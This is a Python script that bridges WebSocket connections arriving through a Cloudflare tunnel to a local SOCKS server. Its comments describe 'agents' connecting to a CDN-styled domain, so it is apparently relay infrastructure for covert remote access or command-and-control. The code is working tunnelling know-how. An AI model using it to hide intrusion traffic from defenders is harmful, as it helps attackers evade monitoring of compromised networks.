#!/usr/bin/env python3
"""
ws_bridge.py — WebSocket to TCP bridge for Cloudflare tunnel
Accepts WebSocket connections from agents, forwards raw bytes to SOCKS server on localhost:443

Agent connects via HTTPS WebSocket to cdn.system-strategy.org
Cloudflare routes to this bridge on :4443
Bridge forwards to SOCKS tunnel server on :443
"""

import asyncio
import hashlib
import base64
import struct
import os
import signal

LISTEN_PORT = 4443
SOCKS_SERVER = ("127.0.0.1", 443)

class WSFrame:
    """Minimal WebSocket frame encoder/decoder"""
    
    @staticmethod
    def encode(data: bytes, opcode=0x02) -> bytes:
        """Encode data into a WebSocket frame (binary, no mask for server->client)"""
        frame = bytearray()
        frame.append(0x80 | opcode)  # FIN + opcode
        length = len(data)
        if length < 126:
            frame.append(length)
        elif length < 65536:
            frame.append(126)
            frame.extend(struct.pack(">H", length))
        else:
            frame.append(127)
            frame.extend(struct.pack(">Q", length))
        frame.extend(data)
        return bytes(frame)
    
    @staticmethod
    async def decode(reader) -> bytes:
        """Read and decode one WebSocket frame"""
        header = await reader.readexactly(2)
        opcode = header[0] & 0x0F
        masked = bool(header[1] & 0x80)
        length = header[1] & 0x7F
        
        if length == 126:
            raw = await reader.readexactly(2)
            length = struct.unpack(">H", raw)[0]
        elif length == 127:
            raw = await reader.readexactly(8)
            length = struct.unpack(">Q", raw)[0]
        
        if length > 10 * 1024 * 1024:  # 10MB max
            return None
        
        mask_key = None
        if masked:
            mask_key = await reader.readexactly(4)
        
        data = await reader.readexactly(length)
        
        if mask_key:
            data = bytearray(data)
            for i in range(len(data)):
                data[i] ^= mask_key[i % 4]
            data = bytes(data)
        
        if opcode == 0x08:  # Close
            return None
        if opcode == 0x09:  # Ping
            return b"PING"
        
        return data


async def handle_ws_handshake(reader, writer):
    """Handle HTTP upgrade to WebSocket"""
    request = b""
    while b"\r\n\r\n" not in request:
        chunk = await reader.read(4096)
        if not chunk:
            return False
        request += chunk
        if len(request) > 8192:
            return False
    
    request_str = request.decode("utf-8", errors="ignore")
    
    # Extract Sec-WebSocket-Key
    key = None
    for line in request_str.split("\r\n"):
        if line.lower().startswith("sec-websocket-key:"):
            key = line.split(":", 1)[1].strip()
            break
    
    if not key:
        writer.write(b"HTTP/1.1 400 Bad Request\r\n\r\n")
        await writer.drain()
        return False
    
    # Compute accept key
    magic = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
    accept = base64.b64encode(hashlib.sha1((key + magic).encode()).digest()).decode()
    
    response = (
        "HTTP/1.1 101 Switching Protocols\r\n"
        "Upgrade: websocket\r\n"
        "Connection: Upgrade\r\n"
        f"Sec-WebSocket-Accept: {accept}\r\n"
        "\r\n"
    )
    writer.write(response.encode())
    await writer.drain()
    return True


async def bridge_ws_to_tcp(ws_reader, ws_writer, tcp_reader, tcp_writer):
    """Forward WebSocket frames to TCP"""
    try:
        while True:
            data = await WSFrame.decode(ws_reader)
            if data is None:
                break
            if data == b"PING":
                ws_writer.write(WSFrame.encode(b"", opcode=0x0A))  # Pong
                await ws_writer.drain()
                continue
            tcp_writer.write(data)
            await tcp_writer.drain()
    except:
        pass
    finally:
        tcp_writer.close()


async def bridge_tcp_to_ws(tcp_reader, ws_writer):
    """Forward TCP data to WebSocket frames"""
    try:
        while True:
            data = await tcp_reader.read(65536)
            if not data:
                break
            ws_writer.write(WSFrame.encode(data))
            await ws_writer.drain()
    except:
        pass
    finally:
        try:
            ws_writer.write(WSFrame.encode(b"", opcode=0x08))  # Close frame
            await ws_writer.drain()
        except:
            pass


async def handle_client(reader, writer):
    addr = writer.get_extra_info("peername")
    
    # WebSocket handshake
    if not await handle_ws_handshake(reader, writer):
        writer.close()
        return
    
    # Connect to SOCKS tunnel server
    try:
        tcp_reader, tcp_writer = await asyncio.open_connection(*SOCKS_SERVER)
    except:
        writer.close()
        return
    
    # Bridge both directions
    t1 = asyncio.create_task(bridge_ws_to_tcp(reader, writer, tcp_reader, tcp_writer))
    t2 = asyncio.create_task(bridge_tcp_to_ws(tcp_reader, writer))
    
    await asyncio.wait([t1, t2], return_when=asyncio.FIRST_COMPLETED)
    
    for t in [t1, t2]:
        t.cancel()
    
    try:
        tcp_writer.close()
    except:
        pass
    try:
        writer.close()
    except:
        pass


async def main():
    server = await asyncio.start_server(handle_client, "127.0.0.1", LISTEN_PORT)
    print(f"[*] WS Bridge: 127.0.0.1:{LISTEN_PORT} -> {SOCKS_SERVER[0]}:{SOCKS_SERVER[1]}")
    async with server:
        await server.serve_forever()


if __name__ == "__main__":
    print("[*] WebSocket-to-TCP Bridge for Cloudflare Tunnel")
    asyncio.run(main())
